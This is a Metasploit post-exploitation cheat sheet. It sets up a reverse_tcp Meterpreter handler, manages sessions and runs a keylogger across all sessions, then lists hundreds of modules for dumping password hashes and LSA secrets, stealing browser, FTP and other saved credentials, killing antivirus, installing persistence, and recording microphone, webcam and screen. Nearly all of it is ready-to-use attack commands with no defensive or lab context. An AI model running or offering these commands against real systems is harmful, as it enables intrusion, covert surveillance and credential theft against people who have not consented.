Some metasploit tricks

Attacker and handler on different machines

Generate payload / exploit vuln

...
set DisablePayloadHandler true
exploit -z

Start handler

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 1337
set ExitOnSession false
exploit -j

View sessions list

sessions

Drop into interactive session

sessions -i 1

Exit session (still active)

ctrl+z or background

Exec command on session -i N or ALL

sessions -C sysinfo

Run keylogger module

sessions -C keyscan_start

wait some time...

sessions -C keyscan_dump

Use extapi (capture clipboard for example)

load extapi
clipboard_get_data

Post modules

run arp_scanner
run autoroute
run checkvm
run credcollect
run domain_list_gen
run dumplinks
run duplicate
run enum_chrome
run enum_firefox
run enum_logged_on_users
run enum_powershell_env
run enum_putty
run enum_shares
run enum_vmware
run event_manager
run file_collector
run get_application_list
run get_env
run get_filezilla_creds
run get_local_subnets
run get_pidgin_creds
run get_valid_community
run getcountermeasure
run getgui
run gettelnet
run getvncpw
run hashdump
run hostsedit
run keylogrecorder
run killav
run metsvc
run migrate
run multi_console_command
run multi_meter_inject
run multicommand
run multiscript
run netenum
run packetrecorder
run panda_2007_pavsrv51
run persistence
run pml_driver_config
run post/multi/gather/apple_ios_backup
run post/multi/gather/check_malware
run post/multi/gather/dbvis_enum
run post/multi/gather/dns_bruteforce
run post/multi/gather/dns_reverse_lookup
run post/multi/gather/dns_srv_lookup
run post/multi/gather/enum_vbox
run post/multi/gather/env
run post/multi/gather/filezilla_client_cred
run post/multi/gather/find_vmx
run post/multi/gather/firefox_creds
run post/multi/gather/jboss_gather
run post/multi/gather/lastpass_creds
run post/multi/gather/maven_creds
run post/multi/gather/multi_command
run post/multi/gather/pgpass_creds
run post/multi/gather/pidgin_cred
run post/multi/gather/ping_sweep
run post/multi/gather/resolve_hosts
run post/multi/gather/run_console_rc_file
run post/multi/gather/skype_enum
run post/multi/gather/thunderbird_creds
run post/multi/gather/tomcat_gather
run post/multi/gather/wlan_geolocate
run post/multi/general/close
run post/multi/general/execute
run post/multi/manage/dbvis_add_db_admin
run post/multi/manage/dbvis_query
run post/multi/manage/multi_post
run post/multi/manage/play_youtube
run post/multi/manage/record_mic
run post/multi/manage/set_wallpaper
run post/multi/manage/upload_exec
run post/multi/manage/zip
run post/multi/recon/local_exploit_suggester
run post/multi/recon/multiport_egress_traffic
run post/windows/capture/keylog_recorder
run post/windows/capture/lockout_keylogger
run post/windows/escalate/droplnk
run post/windows/escalate/getsystem
run post/windows/escalate/golden_ticket
run post/windows/escalate/ms10_073_kbdlayout
run post/windows/escalate/screen_unlock
run post/windows/gather/ad_to_sqlite
run post/windows/gather/arp_scanner
run post/windows/gather/bitcoin_jacker
run post/windows/gather/bitlocker_fvek
run post/windows/gather/cachedump
run post/windows/gather/checkvm
run post/windows/gather/credentials/avira_password
run post/windows/gather/credentials/bulletproof_ftp
run post/windows/gather/credentials/coreftp
run post/windows/gather/credentials/credential_collector
run post/windows/gather/credentials/domain_hashdump
run post/windows/gather/credentials/dynazip_log
run post/windows/gather/credentials/dyndns
run post/windows/gather/credentials/enum_cred_store
run post/windows/gather/credentials/enum_laps
run post/windows/gather/credentials/enum_picasa_pwds
run post/windows/gather/credentials/epo_sql
run post/windows/gather/credentials/filezilla_server
run post/windows/gather/credentials/flashfxp
run post/windows/gather/credentials/ftpnavigator
run post/windows/gather/credentials/ftpx
run post/windows/gather/credentials/gpp
run post/windows/gather/credentials/heidisql
run post/windows/gather/credentials/idm
run post/windows/gather/credentials/imail
run post/windows/gather/credentials/imvu
run post/windows/gather/credentials/mcafee_vse_hashdump
run post/windows/gather/credentials/mdaemon_cred_collector
run post/windows/gather/credentials/meebo
run post/windows/gather/credentials/mremote
run post/windows/gather/credentials/mssql_local_hashdump
run post/windows/gather/credentials/nimbuzz
run post/windows/gather/credentials/outlook
run post/windows/gather/credentials/razer_synapse
run post/windows/gather/credentials/razorsql
run post/windows/gather/credentials/rdc_manager_creds
run post/windows/gather/credentials/skype
run post/windows/gather/credentials/smartermail
run post/windows/gather/credentials/smartftp
run post/windows/gather/credentials/sso
run post/windows/gather/credentials/steam
run post/windows/gather/credentials/tortoisesvn
run post/windows/gather/credentials/total_commander
run post/windows/gather/credentials/trillian
run post/windows/gather/credentials/vnc
run post/windows/gather/credentials/windows_autologin
run post/windows/gather/credentials/winscp
run post/windows/gather/credentials/wsftp_client
run post/windows/gather/dnscache_dump
run post/windows/gather/dumplinks
run post/windows/gather/enum_ad_bitlocker
run post/windows/gather/enum_ad_computers
run post/windows/gather/enum_ad_groups
run post/windows/gather/enum_ad_managedby_groups
run post/windows/gather/enum_ad_service_principal_names
run post/windows/gather/enum_ad_to_wordlist
run post/windows/gather/enum_ad_user_comments
run post/windows/gather/enum_ad_users
run post/windows/gather/enum_applications
run post/windows/gather/enum_artifacts
run post/windows/gather/enum_av_excluded
run post/windows/gather/enum_chrome
run post/windows/gather/enum_computers
run post/windows/gather/enum_db
run post/windows/gather/enum_devices
run post/windows/gather/enum_dirperms
run post/windows/gather/enum_domain
run post/windows/gather/enum_domain_group_users
run post/windows/gather/enum_domain_tokens
run post/windows/gather/enum_domain_users
run post/windows/gather/enum_domains
run post/windows/gather/enum_emet
run post/windows/gather/enum_files
run post/windows/gather/enum_hostfile
run post/windows/gather/enum_ie
run post/windows/gather/enum_logged_on_users
run post/windows/gather/enum_ms_product_keys
run post/windows/gather/enum_patches
run post/windows/gather/enum_powershell_env
run post/windows/gather/enum_proxy
run post/windows/gather/enum_putty_saved_sessions
run post/windows/gather/enum_services
run post/windows/gather/enum_shares
run post/windows/gather/enum_snmp
run post/windows/gather/enum_termserv
run post/windows/gather/enum_tokens
run post/windows/gather/enum_tomcat
run post/windows/gather/enum_trusted_locations
run post/windows/gather/enum_unattend
run post/windows/gather/file_from_raw_ntfs
run post/windows/gather/forensics/browser_history
run post/windows/gather/forensics/duqu_check
run post/windows/gather/forensics/enum_drives
run post/windows/gather/forensics/imager
run post/windows/gather/forensics/nbd_server
run post/windows/gather/forensics/recovery_files
run post/windows/gather/hashdump
run post/windows/gather/local_admin_search_enum
run post/windows/gather/lsa_secrets
run post/windows/gather/make_csv_orgchart
run post/windows/gather/memory_grep
run post/windows/gather/ntds_location
run post/windows/gather/outlook
run post/windows/gather/phish_windows_credentials
run post/windows/gather/resolve_sid
run post/windows/gather/reverse_lookup
run post/windows/gather/screen_spy
run post/windows/gather/smart_hashdump
run post/windows/gather/tcpnetstat
run post/windows/gather/usb_history
run post/windows/gather/win_privs
run post/windows/gather/wmic_command
run post/windows/gather/word_unc_injector
run post/windows/manage/add_user_domain
run post/windows/manage/archmigrate
run post/windows/manage/change_password
run post/windows/manage/clone_proxy_settings
run post/windows/manage/delete_user
run post/windows/manage/download_exec
run post/windows/manage/driver_loader
run post/windows/manage/enable_rdp
run post/windows/manage/enable_support_account
run post/windows/manage/exec_powershell
run post/windows/manage/forward_pageant
run post/windows/manage/hashcarve
run post/windows/manage/ie_proxypac
run post/windows/manage/inject_ca
run post/windows/manage/inject_host
run post/windows/manage/killav
run post/windows/manage/migrate
run post/windows/manage/mssql_local_auth_bypass
run post/windows/manage/multi_meterpreter_inject
run post/windows/manage/nbd_server
run post/windows/manage/payload_inject
run post/windows/manage/persistence_exe
run post/windows/manage/portproxy
run post/windows/manage/powershell/build_net_code
run post/windows/manage/powershell/exec_powershell
run post/windows/manage/pptp_tunnel
run post/windows/manage/priv_migrate
run post/windows/manage/pxeexploit
run post/windows/manage/reflective_dll_inject
run post/windows/manage/remove_ca
run post/windows/manage/remove_host
run post/windows/manage/rpcapd_start
run post/windows/manage/run_as
run post/windows/manage/run_as_psh
run post/windows/manage/sdel
run post/windows/manage/sticky_keys
run post/windows/manage/vmdk_mount
run post/windows/manage/vss_create
run post/windows/manage/vss_list
run post/windows/manage/vss_mount
run post/windows/manage/vss_set_storage
run post/windows/manage/vss_storage
run post/windows/manage/wdigest_caching
run post/windows/manage/webcam
run post/windows/recon/computer_browser_discovery
run post/windows/recon/outbound_ports
run post/windows/recon/resolve_ip
run post/windows/wlan/wlan_bss_list
run post/windows/wlan/wlan_current_connection
run post/windows/wlan/wlan_disconnect
run post/windows/wlan/wlan_profile
run powerdump
run prefetchtool
run process_memdump
run remotewinenum
run scheduleme
run schelevator
run schtasksabuse
run scraper
run screen_unlock
run screenspy
run search_dwld
run service_manager
run service_permissions_escalate
run sound_recorder
run srt_webdrive_priv
run uploadexec
run virtualbox_sysenter_dos
run virusscan_bypass
run vnc
run webcam
run win32-sshclient
run win32-sshserver
run winbf
run winenum
run wmic